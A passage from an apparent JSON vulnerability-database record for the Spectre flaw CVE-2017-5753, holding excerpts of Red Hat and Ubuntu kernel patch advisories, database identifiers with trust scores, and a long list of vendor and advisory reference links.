Linux Workstation (v. 6):\n\nSource:\nkernel-2.6.32-696.18.7.el6.src.rpm\n\ni386:\nkernel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-headers-2.6.32-696.18.7.el6.i686.rpm\nperf-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nnoarch:\nkernel-abi-whitelists-2.6.32-696.18.7.el6.noarch.rpm\nkernel-doc-2.6.32-696.18.7.el6.noarch.rpm\nkernel-firmware-2.6.32-696.18.7.el6.noarch.rpm\n\nx86_64:\nkernel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.i686.rpm\nkernel-debug-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-devel-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-headers-2.6.32-696.18.7.el6.x86_64.rpm\nperf-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 6):\n\ni386:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.i686.rpm\nkernel-debuginfo-common-i686-2.6.32-696.18.7.el6.i686.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\npython-perf-2.6.32-696.18.7.el6.i686.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.i686.rpm\n\nx86_64:\nkernel-debug-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\nkernel-debuginfo-common-x86_64-2.6.32-696.18.7.el6.x86_64.rpm\nperf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-2.6.32-696.18.7.el6.x86_64.rpm\npython-perf-debuginfo-2.6.32-696.18.7.el6.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/updates/classification/#important\nhttps://access.redhat.com/security/vulnerabilities/speculativeexecution\nhttps://access.redhat.com/security/cve/CVE-2017-5753\nhttps://access.redhat.com/security/cve/CVE-2017-5715\nhttps://access.redhat.com/security/cve/CVE-2017-5754\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2018 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFaTXwuXlSAg2UNWIIRAp3LAKCNdSqjVu7zsXcUTnpGuuQAuUlTpwCfTE/O\nOR+iGnoY+cALbsBWKwbmzQM=\n=V4ow\n-----END PGP SIGNATURE-----\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nImage Updates for RHV-H - noarch\nManagement Agent for RHEL 7 Hosts - noarch\n\n3. The appliance is available\nto download as an OVA file from the Customer Portal. 6.5) - x86_64\n\n3. 7) - noarch, x86_64\n\n3. Description:\n\nThe kernel-rt packages provide the Real Time Linux Kernel, which enables\nfine-tuning for systems with extremely high determinism requirements. \n==========================================================================\nUbuntu Security Notice USN-3541-2\nJanuary 23, 2018\n\nlinux-hwe, linux-azure, linux-gcp, linux-oem vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 16.04 LTS\n\nSummary:\n\nSeveral security issues were addressed in the Linux kernel. This update provides the corresponding updates for the\nLinux Hardware Enablement (HWE) kernel from Ubuntu 17.10 for Ubuntu\n16.04 LTS. This flaw is known as Spectre. \n(CVE-2017-5715, CVE-2017-5753)\n\nUSN-3523-2 mitigated CVE-2017-5754 (Meltdown) for the amd64\narchitecture in the Linux Hardware Enablement (HWE) kernel from Ubuntu\n17.10 for Ubuntu 16.04 LTS. This flaw is known as Meltdown. (CVE-2017-5754)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 16.04 LTS:\n  linux-image-4.13.0-1006-azure   4.13.0-1006.8\n  linux-image-4.13.0-1007-gcp     4.13.0-1007.10\n  linux-image-4.13.0-1017-oem     4.13.0-1017.18\n  linux-image-4.13.0-31-generic   4.13.0-31.34~16.04.1\n  linux-image-4.13.0-31-lowlatency  4.13.0-31.34~16.04.1\n  linux-image-azure               4.13.0.1006.7\n  linux-image-gcp                 4.13.0.1007.9\n  linux-image-generic-hwe-16.04   4.13.0.31.51\n  linux-image-gke                 4.13.0.1007.9\n  linux-image-lowlatency-hwe-16.04  4.13.0.31.51\n  linux-image-oem                 4.13.0.1017.21\n\nPlease note that fully mitigating CVE-2017-5715 (Spectre Variant 2)\nrequires corresponding processor microcode/firmware updates or,\nin virtual environments, hypervisor updates. On i386 and amd64\narchitectures, the IBRS and IBPB features are required to enable the\nkernel mitigations. Ubuntu is working with Intel and AMD to provide\nfuture microcode updates that implement IBRS and IBPB as they are made\navailable. Ubuntu users with a processor from a different vendor should\ncontact the vendor to identify necessary firmware updates. Ubuntu\nwill provide corresponding QEMU updates in the future for users of\nself-hosted virtual environments in coordination with upstream QEMU. \nUbuntu users in cloud environments should contact the cloud provider\nto confirm that the hypervisor has been updated to expose the new\nCPU features to virtual machines",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "PACKETSTORM",
        "id": "146015"
      },
      {
        "db": "PACKETSTORM",
        "id": "145717"
      },
      {
        "db": "PACKETSTORM",
        "id": "146501"
      },
      {
        "db": "PACKETSTORM",
        "id": "145964"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "146014"
      },
      {
        "db": "PACKETSTORM",
        "id": "145721"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146019"
      }
    ],
    "trust": 3.51
  },
  "exploit_availability": {
    "_id": null,
    "data": [
      {
        "reference": "https://www.scap.org.cn/vuln/vhn-113956",
        "trust": 0.1,
        "type": "unknown"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      }
    ]
  },
  "external_ids": {
    "_id": null,
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2017-5753",
        "trust": 3.1
      },
      {
        "db": "CERT/CC",
        "id": "VU#584653",
        "trust": 2.2
      },
      {
        "db": "BID",
        "id": "102371",
        "trust": 2.0
      },
      {
        "db": "CERT/CC",
        "id": "VU#180049",
        "trust": 1.9
      },
      {
        "db": "SECTRACK",
        "id": "1040071",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-505225",
        "trust": 1.1
      },
      {
        "db": "SIEMENS",
        "id": "SSA-608355",
        "trust": 1.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145645",
        "trust": 1.1
      },
      {
        "db": "LENOVO",
        "id": "LEN-18282",
        "trust": 1.1
      },
      {
        "db": "EXPLOIT-DB",
        "id": "43427",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-003",
        "trust": 1.1
      },
      {
        "db": "CERT@VDE",
        "id": "VDE-2018-002",
        "trust": 1.1
      },
      {
        "db": "USCERT",
        "id": "TA18-141A",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304",
        "trust": 0.6
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01E",
        "trust": 0.3
      },
      {
        "db": "ICS CERT ALERT",
        "id": "ICS-ALERT-18-011-01C",
        "trust": 0.3
      },
      {
        "db": "JUNIPER",
        "id": "JSA10842",
        "trust": 0.3
      },
      {
        "db": "SIEMENS",
        "id": "SSA-168644",
        "trust": 0.3
      },
      {
        "db": "JVN",
        "id": "JVNVU93823979",
        "trust": 0.3
      },
      {
        "db": "PACKETSTORM",
        "id": "145837",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145774",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "150863",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145715",
        "trust": 0.1
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201801-150",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146015",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145717",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146501",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145964",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "147451",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145641",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146014",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145721",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145658",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "145666",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "146019",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "CERT/CC",
        "id": "VU#180049"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "BID",
        "id": "102371"
      },
      {
        "db": "PACKETSTORM",
        "id": "146015"
      },
      {
        "db": "PACKETSTORM",
        "id": "145717"
      },
      {
        "db": "PACKETSTORM",
        "id": "146501"
      },
      {
        "db": "PACKETSTORM",
        "id": "145964"
      },
      {
        "db": "PACKETSTORM",
        "id": "147451"
      },
      {
        "db": "PACKETSTORM",
        "id": "145641"
      },
      {
        "db": "PACKETSTORM",
        "id": "146014"
      },
      {
        "db": "PACKETSTORM",
        "id": "145721"
      },
      {
        "db": "PACKETSTORM",
        "id": "145658"
      },
      {
        "db": "PACKETSTORM",
        "id": "145666"
      },
      {
        "db": "PACKETSTORM",
        "id": "146019"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "id": "VAR-201801-1712",
  "iot": {
    "_id": null,
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      },
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      }
    ],
    "trust": 1.3252307744444445
  },
  "iot_taxonomy": {
    "_id": null,
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2018-00304"
      }
    ]
  },
  "last_update_date": "2026-04-10T23:37:25.913000Z",
  "problemtype_data": {
    "_id": null,
    "data": [
      {
        "problemtype": "CWE-203",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-200",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-113956"
      },
      {
        "db": "NVD",
        "id": "CVE-2017-5753"
      }
    ]
  },
  "references": {
    "_id": null,
    "data": [
      {
        "trust": 2.2,
        "url": "http://www.kb.cert.org/vuls/id/584653"
      },
      {
        "trust": 1.9,
        "url": "https://developer.arm.com/support/arm-security-updates/speculative-processor-vulnerability"
      },
      {
        "trust": 1.9,
        "url": "https://access.redhat.com/security/vulnerabilities/speculativeexecution"
      },
      {
        "trust": 1.7,
        "url": "http://www.securityfocus.com/bid/102371"
      },
      {
        "trust": 1.6,
        "url": "https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00115.html"
      },
      {
        "trust": 1.6,
        "url": "https://support.apple.com//ht208394"
      },
      {
        "trust": 1.6,
        "url": "http://www.dell.com/support/speculative-store-bypass"
      },
      {
        "trust": 1.4,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180104-cpusidechannel"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html"
      },
      {
        "trust": 1.4,
        "url": "http://xenbits.xen.org/xsa/advisory-254.html"
      },
      {
        "trust": 1.4,
        "url": "https://blog.mozilla.org/security/2018/01/03/mitigations-landing-new-class-timing-attack/"
      },
      {
        "trust": 1.4,
        "url": "https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/adv180002"
      },
      {
        "trust": 1.4,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 1.4,
        "url": "https://spectreattack.com/"
      },
      {
        "trust": 1.4,
        "url": "https://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html"
      },
      {
        "trust": 1.1,
        "url": "https://seclists.org/bugtraq/2019/jun/36"
      },
      {
        "trust": 1.1,
        "url": "https://www.kb.cert.org/vuls/id/180049"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4609"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4611"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4613"
      },
      {
        "trust": 1.1,
        "url": "http://nvidia.custhelp.com/app/answers/detail/a_id/4614"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2018-001.txt"
      },
      {
        "trust": 1.1,
        "url": "http://www.arubanetworks.com/assets/alert/aruba-psa-2019-003.txt"
      },
      {
        "trust": 1.1,
        "url": "https://aws.amazon.com/de/security/security-bulletins/aws-2018-013/"
      },
      {
        "trust": 1.1,
        "url": "https://cdrdv2.intel.com/v1/dl/getcontent/685359"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-505225.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-608355.pdf"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-002"
      },
      {
        "trust": 1.1,
        "url": "https://cert.vde.com/en-us/advisories/vde-2018-003"
      },
      {
        "trust": 1.1,
        "url": "https://help.ecostruxureit.com/display/public/uadco8x/struxureware+data+center+operation+software+vulnerability+fixes"
      },
      {
        "trust": 1.1,
        "url": "https://security.netapp.com/advisory/ntap-20180104-0001/"
      },
      {
        "trust": 1.1,
        "url": "https://support.citrix.com/article/ctx231399"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/csp/article/k91229003"
      },
      {
        "trust": 1.1,
        "url": "https://support.lenovo.com/us/en/solutions/len-18282"
      },
      {
        "trust": 1.1,
        "url": "https://www.mitel.com/en-ca/support/security-advisories/mitel-product-security-advisory-18-0001"
      },
      {
        "trust": 1.1,
        "url": "https://www.suse.com/c/suse-addresses-meltdown-spectre-vulnerabilities/"
      },
      {
        "trust": 1.1,
        "url": "https://www.synology.com/support/security/synology_sa_18_01"
      },
      {
        "trust": 1.1,
        "url": "https://www.vmware.com/us/security/advisories/vmsa-2018-0002.html"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4187"
      },
      {
        "trust": 1.1,
        "url": "https://www.debian.org/security/2018/dsa-4188"
      },
      {
        "trust": 1.1,
        "url": "https://www.exploit-db.com/exploits/43427/"
      },
      {
        "trust": 1.1,
        "url": "https://security.gentoo.org/glsa/201810-06"
      },
      {
        "trust": 1.1,
        "url": "http://packetstormsecurity.com/files/145645/spectre-information-disclosure-proof-of-concept.html"
      },
      {
        "trust": 1.1,
        "url": "https://googleprojectzero.blogspot.com/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 1.1,
        "url": "https://security.googleblog.com/2018/01/todays-cpu-vulnerability-what-you-need.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00015.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2018/07/msg00020.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/03/msg00034.html"
      },
      {
        "trust": 1.1,
        "url": "https://lists.debian.org/debian-lts-announce/2019/04/msg00004.html"
      },
      {
        "trust": 1.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0292"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1040071"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00008.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00014.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2018-01/msg00016.html"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/usn/usn-3516-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3540-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3541-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3542-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3542-2/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3549-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3580-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-1/"
      },
      {
        "trust": 1.1,
        "url": "https://usn.ubuntu.com/3597-2/"
      },
      {
        "trust": 1.0,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.8,
        "url": "https://vuls.cert.org/confluence/display/wiki/vulnerabilities+associated+with+cpu+speculative+execution"
      },
      {
        "trust": 0.8,
        "url": "https://bugs.chromium.org/p/project-zero/issues/detail?id=1528"
      },
      {
        "trust": 0.8,
        "url": "https://developer.amd.com/wp-content/resources/124441_amd64_speculativestorebypassdisable_whitepaper_final.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://www.us-cert.gov/ncas/alerts/ta18-141a"
      },
      {
        "trust": 0.8,
        "url": "http://cwe.mitre.org/data/definitions/208.html"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/c5/63/336996-speculative-execution-side-channel-mitigations.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://software.intel.com/sites/default/files/managed/b9/f9/336983-intel-analysis-of-speculative-execution-side-channels-white-paper.pdf"
      },
      {
        "trust": 0.8,
        "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20180521-cpusidechannel"
      },
      {
        "trust": 0.8,
        "url": "https://fortiguard.com/psirt/fg-ir-18-002"
      },
      {
        "trust": 0.8,
        "url": "https://support.hp.com/us-en/document/c06001626"
      },
      {
        "trust": 0.8,
        "url": "http://www.hitachi.com/hirt/publications/hirt-pub18001/"
      },
      {
        "trust": 0.8,
        "url": "https://www.ibm.com/blogs/psirt/potential-impact-processors-power-family/"
      },
      {
        "trust": 0.8,
        "url": "https://docs.microsoft.com/en-us/cpp/security/developer-guidance-speculative-execution"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/vulnerabilities/ssbd"
      },
      {
        "trust": 0.8,
        "url": "https://www.suse.com/support/kb/doc/?id=7022937"
      },
      {
        "trust": 0.8,
        "url": "https://www.synology.com/en-global/support/security/synology_sa_18_23"
      },
      {
        "trust": 0.8,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/variant4"
      },
      {
        "trust": 0.8,
        "url": "https://kb.vmware.com/s/article/54951"
      },
      {
        "trust": 0.8,
        "url": "https://aws.amazon.com/security/security-bulletins/aws-2018-015/"
      },
      {
        "trust": 0.8,
        "url": "https://access.redhat.com/security/cve/cve-2017-5753"
      },
      {
        "trust": 0.6,
        "url": "https://www.bleepingcomputer.com/news/security/list-of-meltdown-and-spectre-vulnerability-advisories-patches-and-updates/"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5715"
      },
      {
        "trust": 0.6,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5753"
      },
      {
        "trust": 0.5,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-5754"
      },
      {
        "trust": 0.5,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/cve/cve-2017-5715"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.5,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0008"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/errata/rhsa-2018:0016"
      },
      {
        "trust": 0.4,
        "url": "https://wiki.ubuntu.com/securityteam/knowledgebase/spectreandmeltdown"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-5754"
      },
      {
        "trust": 0.3,
        "url": "http://www.amd.com/en-gb"
      },
      {
        "trust": 0.3,
        "url": "https://www.arm.com/"
      },
      {
        "trust": 0.3,
        "url": "http://www.intel.com/content/www/us/en/homepage.html"
      },
      {
        "trust": 0.3,
        "url": "https://newsroom.intel.com/news/intel-responds-to-security-research-findings/"
      },
      {
        "trust": 0.3,
        "url": "https://lwn.net/articles/738975/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10842\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://support.apple.com/en-us/ht208394"
      },
      {
        "trust": 0.3,
        "url": "https://www.chromium.org/home/chromium-security/ssca"
      },
      {
        "trust": 0.3,
        "url": "https://www.amd.com/en/corporate/speculative-execution"
      },
      {
        "trust": 0.3,
        "url": "https://source.android.com/security/bulletin/2018-01-01"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/21"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/22"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/bugtraq/2018/jan/23"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1519778"
      },
      {
        "trust": 0.3,
        "url": "http://xenbits.xenproject.org/xsa/advisory-289.html"
      },
      {
        "trust": 0.3,
        "url": "https://support.google.com/faqs/answer/7622138"
      },
      {
        "trust": 0.3,
        "url": "http://aix.software.ibm.com/aix/efixes/security/spectre_meltdown_advisory.asc"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01c"
      },
      {
        "trust": 0.3,
        "url": "https://ics-cert.us-cert.gov/alerts/ics-alert-18-011-01e"
      },
      {
        "trust": 0.3,
        "url": "https://securityadvisories.paloaltonetworks.com/home/detail/120"
      },
      {
        "trust": 0.3,
        "url": "https://jvn.jp/vu/jvnvu93823979/index.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujan2018-3236628.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.oracle.com/technetwork/topics/security/ovmbulletinapr2018-4431088.html"
      },
      {
        "trust": 0.3,
        "url": "http://www.bd.com/en-us/support/product-security-and-privacy/product-security-bulletin-for-meltdown-and-spectre-update-1"
      },
      {
        "trust": 0.3,
        "url": "https://googleprojectzero.blogspot.in/2018/01/reading-privileged-memory-with-side.html"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0007"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0009"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0010"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0011"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/errata/rhsa-2018:0017"
      },
      {
        "trust": 0.3,
        "url": "https://www.symantec.com/security-center/network-protection-security-advisories/sa161"
      },
      {
        "trust": 0.3,
        "url": "https://www.mozilla.org/en-us/security/advisories/mfsa2018-01/"
      },
      {
        "trust": 0.3,
        "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-168644.pdf"
      },
      {
        "trust": 0.3,
        "url": "https://chromereleases.googleblog.com/2018/03/stable-channel-update-for-chrome-os_19.html"
      },
      {
        "trust": 0.3,
        "url": "https://lists.vmware.com/pipermail/security-announce/2018/000397.html"
      },
      {
        "trust": 0.3,
        "url": "https://www.vmware.com/security/advisories/vmsa-2018-0007.html"
      },
      {
        "trust": 0.3,
        "url": "https://developer.arm.com/support/security-update"
      },
      {
        "trust": 0.3,
        "url": "http://xenbits.xenproject.org/xsa/advisory-289.txt"
      },
      {
        "trust": 0.2,
        "url": "https://www.ubuntu.com/usn/usn-3541-1"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/solutions/3307851"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?doclocale=en_us\u0026amp;docid=emr_na-hpesbhf03871en_us"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/4.13.0-31.34"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2018:0046"
      },
      {
        "trust": 0.1,
        "url": "https://www.ubuntu.com/usn/usn-3580-1"
      },
      {
        "trust": 0.1,
        "url": "https://support.hpe.com/hpsc/doc/public/display?docid=emr_na-a00039267en_us\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://security-center.intel.com/advisory.aspx?intelid=intel-sa-00088\u0026langu"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-hpesbhf03805en_us"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/security_bulletin_archive"
      },
      {
        "trust": 0.1,
        "url": "https://www.hpe.com/info/report-security-vulnerability"
      },
      {
        "trust": 0.1,
        "url": "http://www.hpe.com/support/subscriber_choice"
      },
      {
        "trust": 0.1,
        "url": "https://developer.arm.com/support/security-update\u003e"
      },
      {
        "trust": 0.1,
        "url": "http://www.amd.com/en/corporate/speculative-execution\u003e"
      },
      {
        "trust": 0.1,
        "url": "https://h20564.www2.hpe.com/hpsc/doc/public/display?docid=emr_na-c01345499"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-5803"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-18241"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1066"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-16911"
      },
      {
        "trust": 0.1,
        "url": "https://security-tracker.debian.org/tracker/linux"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-6927"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2018-1068"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2017-13166"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-9016"
      },
      {
        "trust": 0.1,
